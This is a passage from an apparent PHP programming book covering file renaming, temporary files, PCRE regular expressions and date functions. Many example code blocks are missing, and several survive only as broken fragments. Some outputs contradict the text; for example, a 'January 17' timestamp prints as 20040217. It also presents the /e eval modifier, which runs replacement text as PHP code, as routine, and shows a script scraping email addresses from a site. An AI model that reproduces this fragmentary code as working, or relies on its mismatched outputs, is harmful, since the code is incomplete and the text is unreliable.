Moving a file in PHP with the rename() function is atomic if you move/rename the file to a place which is on the same file system. Atomic means that nothing can interfere with this, and that it is always guaranteed not to be interrupted. In case you want to move a file to a different file system, it is safer to do it in two steps: first move the file to a temporary name (.file.txt.tmp) on the target file system, and then rename it to its final name (file.txt). The move as a whole is still not atomic, but the file in the new location will never be there partially, because the renaming from .file.txt.tmp to file.txt is atomic as the rename is on the same file system.

9.2.9 Temporary Files

In case you want to create a temporary file, the best way to do it is with the tmpfile() function. This function creates a temporary file with a unique random name in the system's temporary directory and opens this file for reading and writing. This temporary file will be removed automatically when you close the file with fclose() or when the script ends.

In case you want to have more control over where the temporary file is created and about its name, you can use the tempnam() function. Contrary to the tmpfile() function, this file will not be removed automatically:
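The difference between the two functions can be sketched as follows. The prefix "tst" and the use of the system temporary directory are assumptions for illustration, and reading the path of a tmpfile() handle through the "uri" key of stream_get_meta_data() is a convenience used only to check that the file disappears.

```php
<?php
// tmpfile(): PHP picks the name, and the file is removed when the handle is closed.
$tmp = tmpfile();
$meta = stream_get_meta_data($tmp);
$tmp_path = $meta['uri'];
fwrite($tmp, 'scratch data');
fclose($tmp);
clearstatcache();
$tmp_gone = !file_exists($tmp_path);

// tempnam(): we choose the directory and the prefix, and we must clean up ourselves.
$named = tempnam(sys_get_temp_dir(), 'tst');
file_put_contents($named, 'kept until unlinked');
$named_exists = file_exists($named);
$has_prefix = (strpos(basename($named), 'tst') === 0);
unlink($named);
```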

The first parameter to the function specifies the directory where the temporary file is created, and the second parameter is the prefix that will be added to the random file name.

9.3 REGULAR EXPRESSIONS

Although regular expressions are very powerful, they are difficult to use, especially if you're new to them. So, instead of jumping on the functions that PHP supports for dealing with the regular expressions, we cover the pattern matching syntax first. If PCRE is enabled, the following should show up in phpinfo() output, as shown in Figure 9.3.

Fig. 9.3 PCRE phpinfo() output.

9.3.1 Syntax

PCRE functions check whether a text string matches a pattern. The syntax of a pattern always has the following format:

    <delimiter> <pattern> <delimiter> [<modifiers>]

The modifiers are optional. The delimiter separates the pattern from the modifiers. PCRE uses the first character of the expression as the delimiter. You should use a character that does not exist in the pattern itself. Or, you can use a character that exists in your expression, but then you must escape it with the \. Traditionally, the / is used as the delimiter, but other common delimiters are | or @. It's your choice. Personally, in most cases, we would pick the @, unless we need to do matching on an email or similar pattern that contains the @, in which case we would use the /.

The PHP function preg_match() is used to match regular expressions. The first parameter passed to the function is the pattern. The second parameter is the string to be matched to the pattern and is also called the subject. The function returns 1 (the pattern matches) or 0 (the pattern does not match), which behave as TRUE and FALSE in a condition. You can also pass a third parameter, a variable name. The text that matches is stored by reference in the array with this name. If you don't need to use the matching text but just want to know if there is a match or not, you can leave out the third parameter. In short, the format is as follows, with $matches being optional:

    $result = preg_match($pattern, $subject, $matches);
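As a small illustration of the delimiter choice and the optional third parameter, consider the following sketch. The subject string is made up for the example.

```php
<?php
$subject = 'See http://php.net for the manual';

// With / as the delimiter, every / inside the pattern must be escaped.
$with_slash = preg_match('/http:\/\/php\.net/', $subject);

// With @ as the delimiter, the same pattern needs no escaping of /.
$with_at = preg_match('@http://php\.net@', $subject, $matches);

// No third parameter: we only want to know whether there is a match.
$missing = preg_match('@ftp://@', $subject);
```

After running this, $matches[0] holds the matched text, and the two differently delimited patterns agree on the result.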

Note: The examples in this section will not use the <?php and ?> tags, but of course, they are required.

9.3.1.1 Pattern Syntax

PCRE's matching syntax is very complex. A full discussion of all its details would exceed the scope of this book. We cover just the basics here, which is enough to be very useful. On most UNIX systems with the PCRE library installed, you can use man pcrepattern to read about the whole pattern matching language, or have a look at the (somewhat outdated) PHP Manual page at http://www.php.net/manual/en/pcre.pattern.syntax.php. But here we start with the simple things:

9.3.1.2 Metacharacters

The characters from Table 9.1 are special characters in the way that they can be used to construct patterns.

Table 9.1 Metacharacters

Character   Description

\           The general escape character. You need this in case you want to use any of the metacharacters in your pattern, or the delimiter. The backslash also can be used to specify other special characters, which you can find in the next table.

.           Matches exactly one character, except a newline character.
                preg_match('/./', 'PHP 5', $matches);
            $matches now contains
                Array ( [0] => P )

?           Marks the preceding character or sub-pattern as optional.
                preg_match('/PHP.?5/', 'PHP 5', $matches);
            This matches both PHP5 and PHP 5.

+           Matches the preceding character or sub-pattern one or more times. '/a+b/' matches 'ab', 'aab', and 'aaaaaaaab', but not 'b'. preg_match also returns TRUE in the following example, but $matches does not contain the excessive characters.
                preg_match('/a+b/', 'caaabc', $matches);
            $matches now contains
                Array ( [0] => aaab )

*           Matches the preceding character zero or more times. '/de*f/' matches 'df', 'def', and 'deeeef'. Again, excessive characters are not part of the matched substring, but do not cause the match to fail.

{m}         Matches the preceding character or sub-pattern 'm' times in case the {m} variant is used, or 'm' to 'n' times if the {m,n} variant is used. '/tre{1,2}f/' matches 'tref' and 'treef', but not 'treeef'. It is possible to leave out the 'n' part: if the number after the comma is missing, the upper boundary is undetermined. For a lower boundary of 0, write the 0 explicitly ({0,n}), because PCRE versions before 10.43 treat {,n} as literal text. '/fo{2,}ba{0,2}r/' matches 'foobar', 'fooooooobar', and 'fooobaar', but not 'foobaaar'.
{m,n}

^           Marks the beginning of the subject. '/^ghi/' matches 'ghik' and 'ghi', but not 'fghi'.

$           Marks the end of the subject, unless the last character is a newline (\n) character. In that case, it will match just before that newline character. '/Derick$/' matches "Rethans, Derick" and "Rethans, Derick\n" but not "Derick Rethans".

[ ... ]     Makes a character class out of the characters between the opening and closing bracket. You can use this to create a group of characters to match. Using a hyphen inside the character class creates a range of characters. In case you want to use the hyphen as a character being part of the class, put it as the last character in the class. The caret (^) has a special meaning if it is used as the first character in the class. In this case, it negates the character class, which means that it does not match with the characters listed.
            Example 1:
                preg_match('/[0-9]+/', 'PHP is released in 2005.', $matches);
            $matches now contains
                Array ( [0] => 2005 )
            Example 2:
                preg_match('/[^0-9]+/', 'PHP is released in 2005.', $matches);
            $matches now contains
                Array ( [0] => PHP is released in )
            Note that $matches does not include the dot from the subject because a pattern always matches a consecutive string of characters.
            Inside the character class, you cannot use any of the mentioned metacharacters from this table, except for ^ (to negate the character class), - (to create a range), ] (to end the character class), and the \ (to escape special characters).

( ... )     Creates a sub-pattern, which can be used to group certain elements in a pattern. For example, if we had the string 'PHP in 2005.' and we wanted to extract both the century and the year as two separate entries in the $matches array, we would use the following regexp:
                '/([12][0-9])([0-9]{2})/'
            This creates two sub-patterns:
                ([12][0-9]) to match all centuries from 10 to 29.
                ([0-9]{2}) to match the year in the century.
                preg_match(
                    '/([12][0-9])([0-9]{2})/',
                    'PHP in 2005.',
                    $matches
                );
            $matches now contains
                Array ( [0] => 2005 [1] => 20 [2] => 05 )
            The element with index 0 is always the fully matched string, and all sub-patterns are assigned a number in the order in which they occur in the pattern.

(?: ...)    Creates a sub-pattern that is not captured in the output. You can use this to assert that the pattern is followed by something.
                preg_match('@([A-Za-z ]+)(?:hans)@', 'Derick Rethans', $matches);
            $matches now contains
                Array ( [0] => Derick Rethans [1] => Derick Ret )
            As you can see, the full match string still includes the fully matched part of the subject, but there is only one extra element for the sub-pattern matches. Without the ?: in the second sub-pattern, there would also have been an element containing hans.

(?P<name>...)
            Creates a named sub-pattern. It is the same as a normal sub-pattern, but it generates additional elements in the $matches array.
                preg_match(
                    '/(?P<century>[12][0-9])(?P<year>[0-9]{2})/',
                    'PHP in 2005.',
                    $matches
                );
            $matches now contains:
                Array ( [0] => 2005 [century] => 20 [1] => 20 [year] => 05 [2] => 05 )
            This is useful in case you have a complex pattern and don't want to bother finding out the correct index number in the $matches array.

9.3.1.3 Example 1

Let's dissect some useful complex regular expressions that we can create with the metacharacters from Table 9.1:

    $pattern = "/^([0-9a-f][0-9a-f]:){5}[0-9a-f][0-9a-f]$/";

This pattern matches a MAC address (a unique number bound to a network card) with the format 00:04:23:7c:5d:01. The pattern is bound to the start and end of our subject string with ^ and $, and it contains two parts:

☞ ([0-9a-f][0-9a-f]:){5}. Matches the first five 2 character groups and the associated colon
☞ [0-9a-f][0-9a-f]. The sixth group of two digits

This regexp could also have been written as /^([0-9a-f]{2}:){5}[0-9a-f]{2}$/, which would have been a bit shorter. To test the text against the pattern, use the following code:

    preg_match($pattern, '00:04:23:7c:5d:01', $matches);
    print_r($matches);

With either pattern, the output would be the same, as follows:

    Array
    (
        [0] => 00:04:23:7c:5d:01
        [1] => 5d:
    )

9.3.1.4 Example 2

    "/([^<]+)<([a-zA-Z0-9_-]+@([a-zA-Z0-9_-]+\\.)+[a-zA-Z0-9_-]+)>/"

This pattern is used to match email addresses in the following format:

    'Derick Rethans <derick@php.net>'

This pattern is not good enough to match all email addresses, and validates some addresses that should not be matched. It only serves as a simple example. The first part is /([^<]+)<, as follows:

☞ /. Delimiter used in this pattern.
☞ ([^<]+). Subpattern that matches all characters unless it is the '<' character.
☞ <. The < character, which is not part of any sub-pattern.

The second part is ([a-zA-Z0-9_-]+@([a-zA-Z0-9_-]+\\.)+[a-zA-Z0-9_-]+), which is used to match the email address itself:

☞ [a-zA-Z0-9_-]+. This matches everything until the @ and consists of one or more characters from the specified character class.
☞ @. The @ sign.
☞ ([a-zA-Z0-9_-]+\\.)+. A subpattern that matches one or more levels of subdomains. Notice that the . in the pattern is escaped with the \, but also note that this \ is escaped with another \. This is needed because the pattern is enclosed in double quotes ("). You need to be careful with this. It would usually be better to use single quotes for the pattern.
☞ [a-zA-Z0-9_-]+. The top-level domain name (as in .com). As you can see, the regexp is not correct here; the last part should have been simply [a-z]{2,4}.

Then there is the trailing > and delimiter.
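The remark about quoting can be checked with a short sketch: the double-quoted pattern with \\. and the single-quoted pattern with \. end up as the same string, and both produce the same matches. The variable names are chosen for this illustration only.

```php
<?php
// Double quotes: PHP itself consumes one backslash, so \\. reaches PCRE as \.
$double = "/([^<]+)<([a-zA-Z0-9_-]+@([a-zA-Z0-9_-]+\\.)+[a-zA-Z0-9_-]+)>/";

// Single quotes: \. is passed through to PCRE unchanged.
$single = '/([^<]+)<([a-zA-Z0-9_-]+@([a-zA-Z0-9_-]+\.)+[a-zA-Z0-9_-]+)>/';

$same = ($double === $single);

preg_match($single, 'Derick Rethans <derick@php.net>', $matches);
```

Because single quotes leave far fewer characters for PHP to interpret, what you type is usually what PCRE receives, which is why they are the safer default for patterns.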

The following example shows the contents of the $matches array after running the preg_match() function:

    <?php
    $string = 'Derick Rethans <derick@php.net>';
    preg_match(
        "/([^<]+)<([a-zA-Z0-9_-]+@([a-zA-Z0-9_-]+\\.)+[a-zA-Z0-9_-]+)>/",
        $string,
        $matches
    );
    print_r($matches);
    ?>

The output is

    Array
    (
        [0] => Derick Rethans <derick@php.net>
        [1] => Derick Rethans
        [2] => derick@php.net
        [3] => php.
    )

The fourth element cannot really be avoided because a subpattern was used for the (sub)domain part of the pattern, but of course, it doesn't hurt to have it.

9.3.1.5 Escape Sequences

As shown in the previous table, the character \ is the general escape character. In combination with the character that follows it, the \ stands for a special group of characters. Table 9.2 shows the different cases.

Table 9.2 Escape Sequences

Case        Description

\? \+ \*    The first use of the escape character is to take away the special meaning of the other metacharacters. For example, if you need to match 4** in your pattern, you can use
\[ \] \{        '/^4\*\*$/'
\}          Be careful with using double quotes around your patterns, because PHP gives a special meaning to the \ in there too. The following pattern is therefore equal to the one above.
                "/^4\\*\\*$/"
            (Note: In this case, "/^4\*\*$/" would also have worked because \* is not recognized by PHP as a valid escape sequence, but that is not the correct way to do it.)

\\          Escapes the \ so that it can be used in patterns.
            Now you are probably wondering why we used three slashes in $pattern1 (the single-quoted pattern); this is because PHP recognizes the \ as a special character inside single quotes when it parses the script. This is because you need to use the \ to escape a single quote in such a string ($str = 'derick\'s';). So, the first \ escapes the second \ for the PHP parser, and that combined character escapes the third slash for PCRE. The second pattern inside double quotes even has four slashes. This is because inside double quotes \5 has a special meaning to PHP. It means "the octal character 5," which is, of course, not really useful at all, but it does give a problem for our pattern so we have to escape this slash with another slash, too.

\a          The BEL character (ASCII 7).

\e          The Escape character (ASCII 27).

\f          The Formfeed character (ASCII 12).

\n          The Newline character (ASCII 10).

\r          The Carriage Return character (ASCII 13).

\t          The Tab character (ASCII 9).

\xhh        Any character represented by its hexadecimal code (hh). Use \xdf for the ß (iso-8859-15), for example.

\ddd        Any character represented by its octal code (ddd).

\d          Any decimal digit, which is the same as specifying the character class [0-9] in a pattern.

\D          Any character that is not a decimal digit (is the same as [^0-9]).

\s          Any whitespace character. (It is the same as [\t\f\r\n ], or in words: tab, formfeed, carriage return, newline, and space.)

\S          Any character that is not a whitespace character.

\w          Any character that is part of a word, meaning any letter or digit, or the underscore character. Letters are letters used in the current locale (language-specific). The example outputs
                Array ( [0] => Montr )
                Array ( [0] => Montréal )
            Tip: For this example to work, you will need to have the locale nl_NL installed. Names of locales are system-dependent, too. For example, on Windows, the name of the locale is called nld_nld. See http://www.macmax.org/locales/index_en.html for locale names for MacOS X and http://msdn.microsoft.com/library/default.asp?url=/library/en-us/vclib/html/_crt_language_strings.asp for Windows.

\W          Any character that does not belong to the \w set.

\b          An anchor point for a word boundary. In simple words, this means a point in a string between a word character (\w) and a non-word character (\W). The example matches only the word characters in the subject and outputs
                Array ( [0] => Testing123 )

\B          The opposite of the \b, it acts as an anchor between either two word characters in the \w set, or between two non-word characters from the \W set. Because it stops at the first point that matches this restriction, the example only prints estin.

\Q ... \E   Can be used inside patterns to turn off the special meaning of metacharacters. The pattern '@\Q.+*?\E@' will therefore match the string '.+*?'.

9.3.1.6 Examples

    '/\w+\s+\w+/'

Matches two words separated by whitespace.

    '/(\d{1,3}\.){3}\d{1,3}/'

Matches (but not validates) an IP address. The IP address may appear anywhere in the string. The example outputs

    Array
    (
        [0] => 212.187.38.47
        [1] => 38.
    )

It is interesting to notice that the second element only contains the last one of the three matched subpatterns.

9.3.1.7 Lazy Matching

Suppose you have the following string and you want to match the string inside the first tag:

    <a href="http://php.net/">PHP</a> has an <a href="http://php.net/manual">excellent manual</a>.

The following pattern looks like it will work:

    '@<a.*>(.*)</a>@'

However, when you run the following example, you see that it outputs the wrong result:

    <?php
    $str = '<a href="http://php.net/">PHP</a> has an '.
        '<a href="http://php.net/manual">excellent manual</a>.';
    $pattern = '@<a.*>(.*)</a>@';
    preg_match($pattern, $str, $matches);
    print_r($matches);
    ?>

outputs

    Array
    (
        [0] => <a href="http://php.net/">PHP</a> has an <a href="http://php.net/manual">excellent manual</a>
        [1] => excellent manual
    )

The example fails because the * and the + are greedy operators. They try to match as many characters as possible. In this case, <a.*> will match everything to manual">. You can tell the PCRE engine not to do this by appending the ? to the quantifier. If the ? is added, the PCRE engine tries to match as few characters/sub-patterns as possible, which is what we want here. When the pattern @<a.*?>(.*?)</a>@ is used, the output is correct:

    Array
    (
        [0] => <a href="http://php.net/">PHP</a>
        [1] => PHP
    )

However, this is not the most efficient way. It's usually better to use the pattern @<a[^>]+>([^<]+)</a>@, which requires less processing by the PCRE engine.

9.3.1.8 Modifiers

The modifiers "modify" the behavior of the pattern matching engine. Table 9.3 lists them all with descriptions and examples.

Table 9.3 Modifiers

Modifier    Description

i           Makes the PCRE engine match in a case-insensitive way.
            /[a-z]/ matches a letter in the range a..z.
            /[a-z]/i matches a letter in the ranges A..Z and a..z.

m           Changes the behavior of the ^ and $ in such a way that ^ also matches just after a newline character, and $ also matches just before a newline character. The example outputs
                Array ( )
                Array ( [0] => DEF )

s           With this modifier set, the . (dot) also matches the newline character; without this modifier set (the default), it does not match the newline character. The example outputs
                Array ( )
                Array ( [0] => BC DE )

x           If this modifier is set, you can put arbitrary whitespace inside your pattern, except of course in character classes. The example outputs
                Array ( )
                Array ( [0] => ABC )

e           Only has an effect on the preg_replace() function. When it is set, it performs the normal replacement of back references and then evaluates the replacement string as PHP code. For an example, see the section "Replacement Functions."

A           Setting this modifier has the same effect as using ^ as the first character in your pattern unless the m modifier is set. The example outputs
                Array ( [0] => BC )
                Array ( )

D           Makes the $ only match at the very end of the subject string, and not one character before the end in case that is a newline character. The example outputs
                Array ( [0] => BC )
                Array ( )

U           Swaps the "greediness" of the PCRE engine. Quantifiers become ungreedy by default, and the ? character turns on greediness. This makes the pattern we saw in an earlier example ('@<a.*?>(.*?)</a>@') an equivalent of '@<a.*>(.*)</a>@U'.
                <?php
                $str = '<a href="http://php.net/">PHP</a> has an '.
                    '<a href="http://php.net/manual">'.
                    'excellent manual</a>.';
                $pattern = '@<a.*>(.*)</a>@U';
                preg_match($pattern, $str, $matches);
                print_r($matches);
                ?>
            outputs
                Array
                (
                    [0] => <a href="http://php.net/">PHP</a>
                    [1] => PHP
                )

X           Turns on extra features in the PCRE engine. At the moment, the only feature it turns on is that the engine will throw an error in case an unknown escape sequence was detected. Normally, this would just have been treated as a literal. (Notice that we still have to escape the one \ for PHP itself.) The example outputs:
                Warning: preg_match(): Compilation failed: unrecognized character follows \ at offset 1 in /dat/docs/book/prenticehall/php5powerprogramming/chapters/draft/10-mainstream-extensions/pcre/mod-X.php on line 4

u           Turns on UTF-8 mode. In UTF-8 mode the PCRE engine treats the pattern as UTF-8 encoded. This means that the . (dot) matches a multi-byte character, for example. (The example expects you to view this book in the iso-8859-1 character set; if you view it in UTF-8, you'll see Dérick instead.) The example outputs
                Array ( )
                Array ( [0] => Dérick )

9.3.2 Functions

Three groups of PCRE-related functions are available: matching functions, replacement functions, and splitting functions. preg_match(), discussed previously, belongs to the first group. The second group contains functions that replace substrings, which match a specific pattern. The last group of functions split strings based on regular expression matches.

9.3.2.1 Matching Functions

preg_match() is the function that matches one pattern with the subject string and returns either true or false depending on whether the subject matched the pattern. It also can return an array containing the contents of the different sub-pattern matches.
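Several of the modifiers from Table 9.3, together with lazy matching, can be tried out with preg_match() as in the following sketch. The subjects and patterns are made up for illustration and are not the examples from the table.

```php
<?php
// i: case-insensitive matching
$i = preg_match('/php/i', 'PHP 5');

// m: ^ and $ also match at line boundaries inside the subject
preg_match('/^DEF$/m', "ABC\nDEF\nGHI", $m);

// s: the dot also matches a newline
$with_s    = preg_match('/BC.DE/s', "ABC\nDEF");
$without_s = preg_match('/BC.DE/', "ABC\nDEF");

// x: whitespace inside the pattern is ignored
preg_match('/A B C/x', 'ABC', $x);

// Greedy, lazy, and the U modifier on the same subject
$html = '<b>one</b> and <b>two</b>';
preg_match('@<b>(.*)</b>@', $html, $greedy);
preg_match('@<b>(.*?)</b>@', $html, $lazy);
preg_match('@<b>(.*)</b>@U', $html, $ungreedy);
```

The last three calls show that appending ? to a quantifier and setting the U modifier lead to the same shortest match here, while the plain greedy pattern runs on to the last closing tag.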

The function preg_match_all() is similar, except that it matches the pattern with the subject repeatedly. Finding all the matches is useful when extracting information from documents. Take, for example, the situation in which you want to extract email addresses from a web site:

    ([a-z.]+).?@[a-z0-9]+\.[a-z]{1,6})>/Ui', $doc, $matches );
    var_dump($matches);
    ?>

outputs

    Array
    (
        [0] => Array
            (
                [0] => <bert @w3.org>
                [1] => <tantekc @microsoft.com>
                [2] => <ian @hixie.ch>
                [3] => <howcome @opera.com>
            )
        [email] => Array
            (
                [0] => bert @w3.org
                [1] => tantekc @microsoft.com
                [2] => ian @hixie.ch
                [3] => howcome @opera.com
            )
        [1] => Array
            (
                [0] => bert @w3.org
                [1] => tantekc @microsoft.com
                [2] => ian @hixie.ch
                [3] => howcome @opera.com
            )
        [2] => Array
            (
                [0] => bert
                [1] => tantekc
                [2] => ian
                [3] => howcome
            )
    )

This example reads the contents of the CSS 2.1 specification into a string and decodes the HTML entities in it. The script then uses preg_match_all() on the document, using a pattern that matches < + an email address + >, and stores the email addresses in the $matches array. The output shows that preg_match_all() doesn't store all sub-patterns belonging to one match in one element of the $matches array. Instead, it stores all the sub-pattern matches belonging to the different matches into one element of $matches.

preg_grep() performs similarly to the UNIX egrep command. It compares a pattern against elements of an array containing the subjects. It returns an array containing the elements that were successfully matched against the pattern. See the next example, which returns all valid IP addresses from the $addresses array:

    $pattern = '@^((\d?\d|1\d\d|2[0-4]\d|25[0-5])\.){3}'.
               '(\d?\d|1\d\d|2[0-4]\d|25[0-5])@';
    $addresses = preg_grep($pattern, $addresses);
    print_r($addresses);
    ?>

9.3.2.2 Replacement Functions

In addition to the matching described in the previous section, PHP's regular expression functions can also replace text based on pattern matching. The replacement functions can replace a substring that matches a subpattern with different text. In the replacement, you can refer to the pattern matches using back references. Here is an example that explains the replacement functions. In this example, we use preg_replace() to replace a pseudo-link, such as [link url="www.php.net"]PHP[/link], with a real HTML link:

    \\2';
    $str = preg_replace($pattern, $replacement, $str);
    echo $str;
    ?>

The script outputs

    PHP is cool.

The pattern consists of two sub-patterns, ([^"]+) for the URL and (.*?). Instead of returning the substring of the subject that matches the two sub-patterns, the PCRE engine assigns the substring to back references, which you can access by using \\1 and \\2 in the replacement string. If you don't want to use \\1, you may use $1. Be careful when putting the replacement string into double quotes, because you will have to escape either the slashes (so that a back reference looks like \\\\1) or the dollar sign (so that a back reference looks like \$1). You should always put the replacement string in single quotes.

The full pattern match is assigned to back reference 0, just like the element with key 0 in the matches array of the preg_match() function.

Tip: If the replacement string needs to be back reference + number, you can also use ${1}1 for the first back reference, followed by the number 1.

preg_replace() can replace more than one subject at the same time by using an array of subjects. For instance, the following example script changes the format of the names in the array $names:

The names array is changed to

    array('derick rethans', 'stig sæther bakken', 'andi gutmans');

However, names usually start with an uppercase letter. You can uppercase the first letter by using either the /e modifier or preg_replace_callback(). The /e modifier causes the replacement string to be evaluated as PHP code. Its return value is the replacement string:

If you need to do more complex manipulation with the matched patterns, evaluating replacement strings becomes complicated. You can use the preg_replace_callback() function instead:

Here's one more useful example:

    }

    $data = "This item costs {amount: 27.95 %19%} ".
            "and the other one costs {amount: 29.95 %0%}.\n";

    echo preg_replace_callback (
        '/\{amount\:\ ([0-9.]+)\ \%([0-9.]+)\%\}/',
        'currency_output_vat',
        $data
    );
    ?>

This example originates from a webshop where the format and exchange rate are decoupled from the text, which is stored in a cache file. With this solution, it is possible to use caching techniques and still have a dynamic exchange rate.

preg_replace() and preg_replace_callback() allow the pattern to be an array of patterns. When an array is passed as the first parameter, every pattern is matched against the subject. preg_replace() also enables you to pass an array for the replacement string when the first parameter is an array with patterns:

The first pattern @[A-Z]@e matches any uppercase character and, because the e modifier is used, the accompanying replacement string strtolower(\\0) is evaluated as PHP code. The second pattern [\W] matches all non-word characters and, because the second replacement string is simply _, all non-word characters are replaced by the underscore (_). Because the replacements are done in order, the third pattern matches the already modified subject, replacing all multiple occurrences of _ with one. The subject string contains the following after each pattern/replacement match, as shown in Table 9.4.

Table 9.4 Replacement Steps

Step    | Result
Before: | This is a nice text; with punctuation AND capitals
Step 1: | this is a nice text; with punctuation and capitals
Step 2: | this_is_a_nice_text__with_punctuation_and_capitals
Step 3: | this_is_a_nice_text_with_punctuation_and_capitals
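The three steps in Table 9.4 can be reproduced with the following sketch. It is not the book's script: it swaps the /e modifier for preg_replace_callback() with an anonymous function (which assumes PHP 5.3 or later), and the exact delimiters of the second and third patterns are assumptions.

```php
<?php
$subject = 'This is a nice text; with punctuation AND capitals';

// Step 1: lowercase every uppercase letter through a callback
// (a stand-in for the /e modifier used in the text).
$step1 = preg_replace_callback(
    '@[A-Z]@',
    function ($m) { return strtolower($m[0]); },
    $subject
);

// Steps 2 and 3: an array of patterns with an array of replacements,
// applied in order to the already modified subject.
$patterns     = array('@\W@', '@_+@');
$replacements = array('_', '_');
$result = preg_replace($patterns, $replacements, $step1);

echo $step1, "\n";
echo $result, "\n";
```

Keeping the callback step separate makes it easy to see that the array form of preg_replace() only handles the plain string replacements.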

9.3.2.3 Splitting Strings

The last group of functions includes only preg_split(), which can be used to split a string into substrings by using a regular expression match for the delimiters. PHP provides an explode() function that also splits strings, but explode() can only use a simple string as the delimiter. explode() is much faster than using a regular expression, so you might be better off using explode() when possible. A simple example of preg_split()'s usage might be to split a string into the words it contains. See the following example:

The script outputs

    Array ( [0] => This [1] => is [2] => an [3] => example [4] => for [5] => preg_split [6] => )

As you can see, the last element is empty. By default, the function returns empty elements, too. The character(s) before the end of the string are non-word characters so they act as a delimiter, resulting in an empty element.

You can pass two more parameters to the preg_split() function: a limit and a flag. The "limit" parameter controls how many elements are returned before the splitting stops. In the example, two elements are returned:

The output is

    Array ( [0] => This [1] => is an example for preg_split(). )
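A minimal sketch that is consistent with the two outputs above follows. The subject string is taken from the output; the /\W+/ pattern is an assumption about what the original script used.

```php
<?php
$str = 'This is an example for preg_split().';

// Split on runs of non-word characters. The trailing "()." acts as a
// delimiter too, which leaves an empty last element.
$words = preg_split('/\W+/', $str);

// A limit of 2 stops splitting after the first delimiter.
$limited = preg_split('/\W+/', $str, 2);

print_r($words);
print_r($limited);
```

The underscore in preg_split counts as a word character, which is why that name survives as a single element.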

In the next example, we use -1 as the limit. -1 means that there is no limit at all, and allows us to pass flags without shortening our output array. Three flags specify what is returned:

☞ PREG_SPLIT_NO_EMPTY. Prevents empty elements from ending up in the returned array:

The script outputs

    Array ( [0] => This [1] => is [2] => an [3] => example )

☞ PREG_SPLIT_DELIM_CAPTURE. Returns the delimiters themselves, but only if the delimiters are surrounded by parentheses. We combine the flag with PREG_SPLIT_NO_EMPTY:

The script outputs

    Array ( [0] => This [1] => [2] => is [3] => [4] => an [5] => [6] => example [7] => . )

☞ PREG_SPLIT_OFFSET_CAPTURE. Specifies that the function return a two-dimensional array containing both the text and the offset in the string where the element started. In this example, we combine all three flags:

The script outputs (reformatted):

    array (
        0 => array ( 0 => 'This', 1 => 0 ),
        1 => array ( 0 => ' ', 1 => 4 ),
        2 => array ( 0 => 'is', 1 => 5 ),
        3 => array ( 0 => ' ', 1 => 7 ),
        4 => array ( 0 => 'an', 1 => 8 ),
        5 => array ( 0 => ' ', 1 => 10 ),
        6 => array ( 0 => 'example', 1 => 11 ),
        7 => array ( 0 => '.', 1 => 18 ),
    )

9.4 DATE HANDLING

PHP has a range of functions that handle date and time. Some of these functions work with a so-called UNIX timestamp, which is the number of seconds since January 1, 1970 at 00:00:00 GMT, the beginning of the UNIX epoch. Because PHP only handles signed 32-bit integers and most operating systems don't support negative timestamps, the range in which most of the PHP date functions operate is January 1, 1970 to January 19, 2038. The PEAR::Date package handles dates outside this range and also in a platform-independent way.

9.4.1 Retrieving Date and Time Information

The easiest way of obtaining the current time is with the time() function. It accepts no parameters and simply returns the current timestamp:
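A minimal sketch of the call described above follows. The second half is an added illustration of where the 2038 limit comes from: it formats the largest signed 32-bit value as a GMT date with gmdate().

```php
<?php
// Current UNIX timestamp: whole seconds since 1970-01-01 00:00:00 GMT.
$now = time();
echo $now, "\n";

// Largest value a signed 32-bit integer can hold (2^31 - 1),
// formatted as a GMT date to show the upper end of the range.
$max32 = 2147483647;
$limit = gmdate('Y-m-d H:i:s', $max32);
echo $limit, "\n";
```

The second line printed is 2038-01-19 03:14:07, which matches the January 19, 2038 limit mentioned in the text.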

The resolution is 1 second. If you want some more accuracy, you have two options: microtime() and gettimeofday(). The microtime() function has one annoying peculiarity: The return value is a string containing the decimal part of the timestamp and the number of seconds since the epoch, concatenated with a space. This makes it, of course, a bit hard to use for a timestamp with sub-second resolution:

In putting the two parts back together, you lose some of the precision. The gettimeofday() function has a nicer interface. It returns an array with elements representing the timestamp and additional microseconds. Two more elements are included in this array, but you cannot really rely on them because the underlying system functionality (at least in Linux) is not working correctly:

returns

    Array ( [sec] => 1078006910 [usec] => 339699 [minuteswest] => -60 [dsttime] => 0 )

getdate() and localtime() both return an array. The elements contain information belonging to the (optional) timestamp passed to the function. The returned arrays are not exactly the same. Table 9.5 shows what the elements in the arrays mean.

Table 9.5 Elements in Arrays Returned by localtime() and getdate()

Meaning | Index (localtime()) | Index (getdate()) | Remarks
Seconds | tm_sec | seconds |
Minutes | tm_min | minutes |

Table 9.5 Elements in Arrays Returned by localtime() and getdate() (continued)

Meaning | Index (localtime()) | Index (getdate()) | Remarks
Hours | tm_hour | hours |
Day of month | tm_mday | mday |
Month | tm_mon | mon | For localtime: January=0; for getdate: January=1
Year | tm_year | year |
Day of week | tm_wday | wday | With 0 being Sunday and 6 being Saturday
Day of year | tm_yday | yday | With 0 being January 1st and 365 being December 31st of a leap year
DST in effect | tm_isdst | | Set to true if Daylight Savings Time is in effect
Textual day of week | | weekday | English name of the weekday
Textual month | | month | English name of the month
Timestamp | | 0 | Number of seconds since 01-01-1970

The tm_isdst element of localtime() is especially interesting. It lets you see whether the server is in DST. Also, note that the month number in the return array of localtime() starts with 0, not with 1, which makes December month 11.

The first parameter for both functions is a time stamp, allowing the functions to return date information based on the time you pass them, rather than just on the current time. localtime() normally returns an array with numerical indices, rather than the indices as described in the previous table. To signal the function to return an associative array, you need to pass true as the second parameter. If you want to return this associative array with information about the current time, you need to pass the time() function as first parameter:

Two more date functions are available: gmmktime() and mktime(). Both functions create a timestamp based on parameters passed when the function is called. The difference between the two functions is that gmmktime() treats the date/time parameters passed as Greenwich Mean Time (GMT), while parameters passed to mktime() are treated as local time. The order of parameters is not very user friendly, as you can see in the prototype of the following function:

    timestamp mktime ( [$hour [, $minute [, $second [, $month [, $day [, $year [, $is_dst]]]]]]])

Note the particularly weird order of the parameters. All parameters are optional. If any parameter is not included, the "current" value is used, depending on the current date and time. The last parameter, $is_dst, controls whether the date and time parameters that are passed to the function are DST-enabled or not. The default value for the parameter is -1, which signals PHP to determine for itself whether the date falls into the range when DST is observed. Here is an example:

The first three calls "make" a timestamp for January 17, in which no DST is observed. Therefore, setting the $is_dst parameter to 0 has no effect on the returned timestamp. If it's set to 1, though, the timestamp will be one hour earlier, as the mktime() function converts the DST time (which is always one hour ahead of non-DST). For the second set of mktime() calls, we use June 17 in which DST is observed. Setting the $is_dst parameter to 0 now makes the function convert the time from non-DST to DST and, thus, the returned timestamp will be one hour ahead of the result of the first and third calls. The output is

    20040217 15:16:17
    20040217 15:16:17
    20040217 14:16:17
    20040617 15:16:17
